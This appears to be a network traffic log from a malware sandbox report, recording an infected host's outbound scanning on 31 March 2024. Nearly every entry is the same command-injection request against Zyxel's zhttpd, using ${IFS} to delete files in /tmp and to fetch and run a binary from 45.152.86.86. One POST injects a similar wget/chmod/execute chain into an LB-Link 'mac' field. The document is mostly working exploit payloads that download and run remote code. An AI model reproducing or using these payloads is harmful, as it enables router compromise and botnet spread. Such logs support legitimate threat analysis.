                                        Mar 31, 2024 09:20:45.433718920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2314192.168.2.2345556164.3.17.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433767080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2315192.168.2.235390614.115.24.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433840990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2316192.168.2.2359962194.146.247.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433892965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2317192.168.2.2348068207.155.238.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433948994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2318192.168.2.234630846.195.142.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434004068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2319192.168.2.2360824151.103.195.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434065104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2320192.168.2.2340108140.104.43.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434139967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2321192.168.2.234965838.91.40.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434206009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2322192.168.2.235790453.42.185.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434259892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2323192.168.2.2340930118.156.76.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434319973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2324192.168.2.235525271.11.145.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434395075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2325192.168.2.2337524164.3.214.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434446096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2326192.168.2.2338960100.51.173.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434536934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2327192.168.2.2333958148.57.204.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434586048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2328192.168.2.235843074.40.145.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434633970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2329192.168.2.235261034.176.34.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434695959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2330192.168.2.2333944192.22.70.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434762001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2331192.168.2.233639474.151.95.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434834003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2332192.168.2.236056414.92.112.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434880972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2333192.168.2.234461213.39.89.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.434937954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2334192.168.2.2349964139.251.248.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435023069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2335192.168.2.2336986174.165.83.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435080051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2336192.168.2.2335638211.37.182.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435142994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2337192.168.2.2339666162.25.122.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435199976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2338192.168.2.2347840196.135.76.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435287952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2339192.168.2.234235619.27.115.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435339928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2340192.168.2.2356402149.241.30.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435416937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2341192.168.2.2356872101.62.150.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435491085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2342192.168.2.2346816209.229.202.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435576916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2343192.168.2.2357154119.174.12.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435659885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2344192.168.2.2345016220.234.12.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.435702085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2345192.168.2.2345264162.121.3.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.443782091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2346192.168.2.2347738141.69.206.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.444763899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2347192.168.2.233997066.55.157.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.444820881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2348192.168.2.2340768169.131.168.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.444896936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2349192.168.2.233891887.29.114.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.444957018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2350192.168.2.234992018.151.158.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445003033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2351192.168.2.234033285.42.59.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445077896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2352192.168.2.235318470.101.209.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445132971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2353192.168.2.2350812202.55.126.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445204020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2354192.168.2.233936284.132.124.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445276976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2355192.168.2.235773072.209.112.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445316076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2356192.168.2.234607678.165.128.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445472002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2357192.168.2.233671412.173.117.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445525885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2358192.168.2.2340458189.40.150.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.445584059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2359192.168.2.234543663.159.176.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:46.424067974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2360192.168.2.2351350170.126.255.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:46.424113989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2361192.168.2.2345570196.57.49.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:46.424170017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2362192.168.2.2345474133.136.221.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:46.424418926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2363192.168.2.234057442.14.102.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:46.424468040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2364192.168.2.236086272.110.35.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:46.424509048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2365192.168.2.23551328.191.39.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:46.424624920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2366192.168.2.2357850104.22.48.558080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.346196890 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:47.440602064 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:20:47 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2367192.168.2.235047485.241.160.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.456234932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2368192.168.2.235360414.28.236.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.456259012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2369192.168.2.233585441.4.1.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.456305981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2370192.168.2.2357874176.194.96.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.456356049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2371192.168.2.2338900136.133.179.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.456573963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2372192.168.2.235495014.64.144.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.456609964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2373192.168.2.2354470165.16.49.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:47.456660986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2374192.168.2.233846278.13.154.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466104031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2375192.168.2.235834287.83.184.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466157913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2376192.168.2.233516672.226.95.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466212034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2377192.168.2.2347744175.215.83.91443
                                        TimestampBytes transferredDirectionData
